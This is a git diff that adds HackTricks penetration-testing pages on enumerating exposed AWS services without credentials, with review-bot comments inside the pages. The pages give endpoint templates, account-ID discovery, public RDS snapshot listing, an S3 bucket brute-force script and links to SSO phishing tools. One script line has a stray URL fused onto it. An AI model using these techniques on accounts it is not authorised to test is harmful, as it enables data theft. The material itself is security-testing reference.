+ +### Automatic Tools + +* [https://github.com/christophetd/aws-sso-device-code-authentication](https://github.com/christophetd/aws-sso-device-code-authentication) +* [https://github.com/sebastian-mora/awsssome\_phish](https://github.com/sebastian-mora/awsssome_phish) + +## References + +* [https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/) +* [https://ruse.tech/blogs/aws-sso-phishing](https://ruse.tech/blogs/aws-sso-phishing) +* [https://mjg59.dreamwidth.org/62175.html](https://mjg59.dreamwidth.org/62175.html) +* [https://ramimac.me/aws-device-auth](https://ramimac.me/aws-device-auth) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
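Review bot: the impersonation snippet in step 5 is not valid Python as published, because the values of `accountId=` and `roleName=` in `list_account_roles(...)` and `get_role_credentials(...)` have been lost (angle-bracket placeholders such as `<account_id>` are swallowed by the GitBook renderer); the same stripping hit the requisite "the subdomain used by the victim `.awsapps.com/start`", which now reads as if the subdomain were empty. Use quoted placeholders (`accountId='ACCOUNT_ID'`, `roleName='ROLE_NAME'`, `SUBDOMAIN.awsapps.com/start`) so they survive rendering, and close the quote in the sample output `"region":"us-east-1`. On "The SSO access token is valid for 8h": 8 hours is the Identity Center default session length, not a constant; `create_token` returns `expiresIn` next to `accessToken`, so step 4 should read `token_response.get('expiresIn')` instead of assuming it. It would also help the defensive reader to say that `register_client`, `start_device_authorization` and `create_token` are all `sso-oidc` API calls made against the victim's Identity Center region, which is where CloudTrail records them. Typos: "Indentity Center", "promp", "you awesome social engineering skills", "unphisable" (heading and body).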
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md new file mode 100644 index 0000000000..6cb420ff70 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md @@ -0,0 +1,39 @@ +# AWS - IoT Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Public URL template + +``` +mqtt://{random_id}.iot.{region}.amazonaws.com:8883 +https://{random_id}.iot.{region}.amazonaws.com:8443 +https://{random_id}.iot.{region}.amazonaws.com:443 +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
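Review bot: the first template line `mqtt://{random_id}.iot.{region}.amazonaws.com:8883` is misleading on an "unauthenticated enum" page: 8883 is MQTT over TLS (`mqtts://`) and AWS IoT Core requires a registered X.509 client certificate on it, so nothing can be read there without credentials; the 443 endpoints likewise expect either a client certificate (MQTT over ALPN) or SigV4-signed HTTPS. Add one sentence on what an unauthenticated tester can actually get from these hosts (confirming the endpoint exists and which region the account's IoT data plane lives in) and what each port expects. The ATS data endpoints AWS recommends also carry a suffix, `{prefix}-ats.iot.{region}.amazonaws.com`, so that variant belongs in the template next to the legacy form.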
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md new file mode 100644 index 0000000000..0ea3e2d460 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md @@ -0,0 +1,37 @@ +# AWS - Kinesis Video Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Public URL template + +``` +https://{random_id}.kinesisvideo.{region}.amazonaws.com +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md new file mode 100644 index 0000000000..aac5761199 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md @@ -0,0 +1,48 @@ +# AWS - Lambda Unauthenticated Access + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Public Function URL + +It's possible to relate a **Lambda** with a **public function URL** that anyone can access. It could contain web vulnerabilities. + +### Public URL template + +``` +https://{random_id}.lambda-url.{region}.on.aws/ +``` + +### Get Account ID from public Lambda URL + +Just like with S3 buckets, Data Exchange and API gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public lambda URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ +This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). + +You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
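Review bot: "a public function URL that anyone can access" is only true when the URL was created with auth type `NONE`; a function URL with auth type `AWS_IAM` rejects unsigned requests with a 403, so the sentence should say which mode it means and the tester should expect the IAM-protected variant to refuse them. The account-ID paragraph should also say whose policy the `aws:ResourceAccount` condition sits in: it is attached to the attacker's own principal (the same role-based setup the S3 page in this commit uses with `s3-account-search arn:aws:iam::123456789012:role/s3_read`), and the wildcard is narrowed one character at a time from there; as written the reader cannot tell where the condition key is evaluated.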
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md new file mode 100644 index 0000000000..1d1e83f040 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md @@ -0,0 +1,39 @@ +# AWS - Media Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Public URL template + +``` +https://{random_id}.mediaconvert.{region}.amazonaws.com +https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel +https://{random_id}.data.mediastore.{region}.amazonaws.com +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md new file mode 100644 index 0000000000..1c748c6d47 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md @@ -0,0 +1,48 @@ +# AWS - MQ Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Public Port + +### **RabbitMQ** + +In case of **RabbitMQ**, by **default public access** and ssl are enabled. But you need **credentials** to access (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Moreover, it's possible to **access the web management console** if you know the credentials in `https://b-.mq.us-east-1.amazonaws.com/` + +### ActiveMQ + +In case of **ActiveMQ**, by default public access and ssl are enabled, but you need credentials to access. + +### Public URL template + +``` +https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/ +ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
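Review bot: the broker-id placeholders in the RabbitMQ paragraph were stripped, so `amqps://.mq.us-east-1.amazonaws.com:5671` and `https://b-.mq.us-east-1.amazonaws.com/` read as if the host were empty; write them in the style of the template below, `amqps://b-{random_id}.mq.{region}.amazonaws.com:5671` and `https://b-{random_id}.mq.{region}.amazonaws.com/`. The "Public URL template" then only covers ActiveMQ (8162 web console, 61617 OpenWire over TLS); add the two RabbitMQ lines so the template matches the prose, and say plainly that on both engines the unauthenticated value is limited to confirming the broker exists and which engine it runs, since every listener named here needs credentials.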
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md new file mode 100644 index 0000000000..0de37352c7 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md @@ -0,0 +1,44 @@ +# AWS - MSK Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Public Port + +It's possible to **expose the Kafka broker to the public**, but you will need **credentials**, IAM permissions or a valid certificate (depending on the auth method configured). + +It's also **possible to disabled authentication**, but in that case **it's not possible to directly expose** the port to the Internet. + +### Public URL template + +``` +b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com +{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
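Review bot: the second template line `{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com` hard-codes a misspelt region (`useast-1` should be `us-east-1`) while the line above uses `{region}`; make both lines use `{region}`. Grammar: "It's also possible to disabled authentication" should be "to disable authentication". The prose says credentials, IAM or a certificate are needed but gives no ports, so add the public listener ports per auth mode (9194 for TLS client certificates, 9196 for SASL/SCRAM, 9198 for IAM) and state the consequence of the second sentence explicitly: the unauthenticated plaintext listener is never reachable from the Internet, so this page can only confirm that a cluster exists and which auth modes it exposes.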
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md new file mode 100644 index 0000000000..fa2b1ba730 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md @@ -0,0 +1,70 @@ +# AWS - RDS Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## RDS + +For more information check: + +{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} +[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) +{% endcontent-ref %} + +## Public Port + +It's possible to give public access to the **database from the internet**. The attacker will still need to **know the username and password,** IAM access, or an **exploit** to enter in the database. + +## Public RDS Snapshots + +AWS allows giving **access to anyone to download RDS snapshots**. You can list these public RDS snapshots very easily from your own account: + +```bash +# Public RDS snapshots +aws rds describe-db-snapshots --include-public + +## Search by account ID +aws rds describe-db-snapshots --include-public --query 'DBSnapshots[?contains(DBSnapshotIdentifier, `284546856933:`) == `true`]' +## To share a RDS snapshot with everybody the RDS DB cannot be encrypted (so the snapshot won't be encryted) +## To share a RDS encrypted snapshot you need to share the KMS key also with the account + + +# From the own account you can check if there is any public snapshot with: +aws rds describe-db-snapshots --snapshot-type public [--region us-west-2] +## Even if in the console appear as there are public snapshot it might be public +## snapshots from other accounts used by the current account +``` + +### Public URL template + +``` +mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 +postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
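Review bot: the comment under the last command, "Even if in the console appear as there are public snapshot it might be public snapshots from other accounts used by the current account", is hard to parse; what it means is that `aws rds describe-db-snapshots --snapshot-type public` returns every public snapshot visible to the caller, other accounts' included, so a non-empty result does not prove the current account has published one, and you should filter on the account ID in the ARN as the `--query 'DBSnapshots[?contains(DBSnapshotIdentifier, ...)]'` line does. Two gaps: `describe-db-snapshots` only covers instance snapshots, Aurora cluster snapshots need `aws rds describe-db-cluster-snapshots --include-public` with the same filter; and once a public snapshot is found the follow-up is `aws rds restore-db-instance-from-db-snapshot` into your own account, which is what turns a listing into data exfiltration. Mark `284546856933` as an example account ID. The encrypted-snapshot comment is the right caveat to keep: public sharing is refused for encrypted snapshots, so a KMS key shared with a specific account is the only way those leak.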
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md new file mode 100644 index 0000000000..a6e2a448ae --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md @@ -0,0 +1,37 @@ +# AWS - Redshift Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Public URL template + +``` +{user_provided}...redshift.amazonaws.com +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
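Review bot: the template `{user_provided}...redshift.amazonaws.com` has lost its middle components (the same placeholder stripping seen in the other files of this commit); the endpoint form is `{user_provided}.{random_id}.{region}.redshift.amazonaws.com:5439`, in the same style as the RDS template, and the page should say that the port is only reachable when the cluster was created as publicly accessible and still requires database credentials or IAM-issued temporary credentials.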
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md new file mode 100644 index 0000000000..ec6530ee85 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md @@ -0,0 +1,228 @@ +# AWS - S3 Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## S3 Public Buckets + +A bucket is considered **“public”** if **any user can list the contents** of the bucket, and **“private”** if the bucket's contents can **only be listed or written by certain users**. + +Companies might have **buckets permissions miss-configured** giving access either to everything or to everyone authenticated in AWS in any account (so to anyone). Note, that even with such misconfigurations some actions might not be able to be performed as buckets might have their own access control lists (ACLs). + +**Learn about AWS-S3 misconfiguration here:** [**http://flaws.cloud**](http://flaws.cloud/) **and** [**http://flaws2.cloud/**](http://flaws2.cloud) + +### Finding AWS Buckets + +Different methods to find when a webpage is using AWS to storage some resources: + +#### Enumeration & OSINT: + +* Using **wappalyzer** browser plugin +* Using burp (**spidering** the web) or by manually navigating through the page all **resources** **loaded** will be save in the History. +* **Check for resources** in domains like: + + ``` + http://s3.amazonaws.com/[bucket_name]/ + http://[bucket_name].s3.amazonaws.com/ + ``` +* Check for **CNAMES** as `resources.domain.com` might have the CNAME `bucket.s3.amazonaws.com` +* Check [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/), a web with already **discovered open buckets**. +* The **bucket name** and the **bucket domain name** needs to be **the same.** + * **flaws.cloud** is in **IP** 52.92.181.107 and if you go there it redirects you to [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/). Also, `dig -x 52.92.181.107` gives `s3-website-us-west-2.amazonaws.com`. + * To check it's a bucket you can also **visit** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/). 
+ +#### Brute-Force + +You can find buckets by **brute-forcing name**s related to the company you are pentesting: + +* [https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner) +* [https://github.com/clario-tech/s3-inspector](https://github.com/clario-tech/s3-inspector) +* [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) (Contains a list with potential bucket names) +* [https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets](https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets) +* [https://github.com/smaranchand/bucky](https://github.com/smaranchand/bucky) +* [https://github.com/tomdev/teh\_s3\_bucketeers](https://github.com/tomdev/teh_s3_bucketeers) +* [https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3) +* [https://github.com/Eilonh/s3crets\_scanner](https://github.com/Eilonh/s3crets_scanner) +* [https://github.com/belane/CloudHunter](https://github.com/belane/CloudHunter) + +
# Generate a wordlist to create permutations
+curl -s https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt > /tmp/words-s3.txt.temp
+curl -s https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt >>/tmp/words-s3.txt.temp
+cat /tmp/words-s3.txt.temp | sort -u > /tmp/words-s3.txt
+
+# Generate a wordlist based on the domains and subdomains to test
+## Write those domains and subdomains in subdomains.txt
+cat subdomains.txt > /tmp/words-hosts-s3.txt
+cat subdomains.txt | tr "." "-" >> /tmp/words-hosts-s3.txt
+cat subdomains.txt | tr "." "\n" | sort -u >> /tmp/words-hosts-s3.txt
+
+# Create permutations based in a list with the domains and subdomains to attack
+goaltdns -l /tmp/words-hosts-s3.txt -w /tmp/words-s3.txt -o /tmp/final-words-s3.txt.temp
+## The previous tool is specialized increating permutations for subdomains, lets filter that list
+### Remove lines ending with "."
+cat /tmp/final-words-s3.txt.temp | grep -Ev "\.$" > /tmp/final-words-s3.txt.temp2
+### Create list without TLD
+cat /tmp/final-words-s3.txt.temp2 | sed -E 's/\.[a-zA-Z0-9]+$//' > /tmp/final-words-s3.txt.temp3
+### Create list without dots
+cat /tmp/final-words-s3.txt.temp3 | tr -d "." > /tmp/final-words-s3.txt.temp4http://phantom.s3.amazonaws.com/
+### Create list without hyphens
